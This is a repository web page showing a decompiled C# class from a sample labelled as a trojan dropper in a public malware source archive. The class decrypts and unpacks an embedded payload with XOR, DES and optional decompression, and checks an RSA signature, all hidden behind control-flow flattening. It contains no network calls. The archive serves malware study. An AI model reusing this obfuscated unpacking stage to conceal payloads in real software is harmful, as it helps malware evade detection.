ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-21 02:46:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/l.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

420 lines
9.7 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: l
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal sealed class l
{
private const int a = 8;
private const int b = 20;
private const int c = 4;
private static byte[] d = new byte[4];
private static byte[] e;
static l()
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
l.e = new byte[4];
num = 4;
continue;
case 1:
l.d[1] = l.e[1] = (byte) 83;
num = 3;
continue;
case 2:
l.e[3] = (byte) 50;
num = 6;
continue;
case 3:
l.d[2] = l.e[2] = (byte) 65;
num = 5;
continue;
case 4:
l.d[0] = l.e[0] = (byte) 82;
num = 1;
continue;
case 5:
l.d[3] = (byte) 49;
num = 2;
continue;
case 6:
goto label_9;
default:
goto label_2;
}
}
label_9:;
}
public static MemoryStream a(Stream a)
{
BinaryReader binaryReader1 = new BinaryReader(a);
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if ((!flag1 ? 1 : 0) == 0)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
int num = 7;
int count2;
int count3;
bool flag2;
byte[] numArray1;
byte[] buffer3;
bool flag3;
while (true)
{
switch (num)
{
case 0:
count2 = (int) binaryReader2.ReadByte();
num = 3;
continue;
case 1:
count3 = (int) binaryReader2.ReadByte();
num = 8;
continue;
case 2:
flag2 = binaryReader2.ReadBoolean();
num = 0;
continue;
case 3:
numArray1 = new byte[count2];
num = 4;
continue;
case 4:
if (flag2)
{
num = 10;
continue;
}
goto label_19;
case 5:
binaryReader2.Read(buffer3, 0, count3);
num = 6;
continue;
case 6:
cryptoServiceProvider.IV = buffer3;
num = 2;
continue;
case 7:
binaryReader2.ReadString();
num = 9;
continue;
case 8:
buffer3 = new byte[count3];
num = 5;
continue;
case 9:
flag3 = binaryReader2.ReadBoolean();
num = 1;
continue;
case 10:
goto label_18;
default:
goto label_6;
}
}
label_18:
binaryReader2.Read(numArray1, 0, count2);
label_19:
RSACryptoServiceProvider a1 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] numArray2 = new byte[count4];
binaryReader2.Read(numArray2, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray1, 0, count2);
numArray1[5] |= (byte) 128;
a1 = new RSACryptoServiceProvider();
a1.ImportParameters(l.a(publicKey));
}
cryptoServiceProvider.Key = numArray1;
MemoryStream a2 = new MemoryStream();
using (CryptoStream a3 = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
{
if (flag3)
j.a((Stream) a3, (Stream) a2);
else
l.a((Stream) a3, (Stream) a2);
}
if (a1 != null)
{
a2.Position = 0L;
if (!l.a(a1, (Stream) a2, numArray2))
throw new InvalidOperationException();
}
a2.Position = 0L;
return a2;
}
private static byte[] a(byte[] a1, int a2, int a3)
{
if ((a1 == null ? 1 : 0) == 0)
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (a1.Length < a2 + a3)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_6:
byte[] destinationArray = new byte[a3];
Array.Copy((Array) a1, a2, (Array) destinationArray, 0, a3);
return destinationArray;
}
label_5:
return (byte[]) null;
}
private static void a(Stream a1, Stream a2)
{
byte[] buffer = new byte[4096];
while (true)
{
int count = a1.Read(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
a2.Write(buffer, 0, count);
else
break;
}
}
private static RSAParameters a(byte[] a)
{
bool flag = a.Length == 160;
if ((!flag ? 1 : 0) == 0 && !l.a(a, l.d, 20))
return new RSAParameters();
if (!flag && !l.a(a, l.e, 8))
return new RSAParameters();
RSAParameters rsaParameters = new RSAParameters();
int a1 = (flag ? 20 : 8) + 8;
int a2 = 4;
rsaParameters.Exponent = l.a(a, a1, a2);
Array.Reverse((Array) rsaParameters.Exponent);
int a3 = a1 + a2;
int a4 = 128;
rsaParameters.Modulus = l.a(a, a3, a4);
Array.Reverse((Array) rsaParameters.Modulus);
if (flag)
return rsaParameters;
int a5 = a3 + a4;
label_8:
int num = 14;
while (true)
{
switch (num)
{
case 0:
rsaParameters.P = l.a(a, a5, a4);
num = 12;
continue;
case 1:
rsaParameters.DQ = l.a(a, a5, a4);
num = 6;
continue;
case 2:
a5 += a4;
num = 15;
continue;
case 3:
rsaParameters.D = l.a(a, a5, a4);
num = 10;
continue;
case 4:
a5 += a4;
num = 7;
continue;
case 5:
rsaParameters.InverseQ = l.a(a, a5, a4);
num = 9;
continue;
case 6:
Array.Reverse((Array) rsaParameters.DQ);
num = 2;
continue;
case 7:
a4 = 64;
num = 1;
continue;
case 8:
a4 = 64;
num = 17;
continue;
case 9:
Array.Reverse((Array) rsaParameters.InverseQ);
num = 13;
continue;
case 10:
Array.Reverse((Array) rsaParameters.D);
num = 23;
continue;
case 11:
Array.Reverse((Array) rsaParameters.DP);
num = 4;
continue;
case 12:
Array.Reverse((Array) rsaParameters.P);
num = 16;
continue;
case 13:
a5 += a4;
num = 19;
continue;
case 14:
a4 = 64;
num = 0;
continue;
case 15:
a4 = 64;
num = 5;
continue;
case 16:
a5 += a4;
num = 21;
continue;
case 17:
rsaParameters.DP = l.a(a, a5, a4);
num = 11;
continue;
case 18:
rsaParameters.Q = l.a(a, a5, a4);
num = 20;
continue;
case 19:
a4 = 128;
num = 3;
continue;
case 20:
Array.Reverse((Array) rsaParameters.Q);
num = 22;
continue;
case 21:
a4 = 64;
num = 18;
continue;
case 22:
a5 += a4;
num = 8;
continue;
case 23:
goto label_32;
default:
goto label_8;
}
}
label_32:
return rsaParameters;
}
private static bool a(byte[] a1, byte[] a2, int a3)
{
int index = 0;
if ((index == 0 ? 1 : 0) != 0)
goto label_7;
else
goto label_2;
label_1:
int num;
switch (num)
{
case 0:
goto label_3;
case 1:
return false;
}
label_2:
num = 0;
goto label_1;
label_3:
if ((int) a1[index + a3] != (int) a2[index])
{
num = 1;
goto label_1;
}
else
++index;
label_7:
if (index >= a2.Length)
return true;
goto label_3;
}
private static bool a(RSACryptoServiceProvider a1, Stream a2, byte[] a3)
{
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
int num = 0;
byte[] hash;
string name;
while (true)
{
switch (num)
{
case 0:
hash = cryptoServiceProvider.ComputeHash(a2);
num = 3;
continue;
case 1:
name += (string) (object) 'A';
num = 4;
continue;
case 2:
name += (string) (object) 'H';
num = 1;
continue;
case 3:
name = new string('S', 1);
num = 2;
continue;
case 4:
name += (string) (object) '1';
num = 5;
continue;
case 5:
goto label_8;
default:
goto label_2;
}
}
label_8:
return a1.VerifyHash(hash, CryptoConfig.MapNameToOID(name), a3);
}
}
Reference in New Issue View Git Blame Copy Permalink